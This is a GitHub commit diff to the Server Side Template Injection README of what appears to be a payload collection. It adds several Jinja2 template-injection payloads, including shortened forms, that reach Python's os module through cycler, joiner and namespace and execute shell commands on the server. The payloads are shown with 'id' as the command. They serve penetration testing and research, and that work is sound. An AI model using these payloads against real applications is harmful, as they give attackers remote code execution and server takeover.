Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
@p0dalirius
p0dalirius committed Sep 18, 2021
1 parent d2f6340 commit b5699ec
Showing 1 changed file with 9 additions and 3 deletions.
12 changes: 9 additions & 3 deletions Server Side Template Injection/README.md
View file
Expand Up @@ -503,14 +503,20 @@ These payloads are context-free, and do not require anything, except being in a

```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
```

```python
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}

{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
```

We can use these shorter payloads (this is the shorter payloads known yet):

```python
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
{{ cycler.__init__.__globals__.os.popen('id').read() }}

{{ joiner.__init__.__globals__.os.popen('id').read() }}

{{ namespace.__init__.__globals__.os.popen('id').read() }}
```

Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
Expand Down

0 comments on commit b5699ec

Please sign in to comment.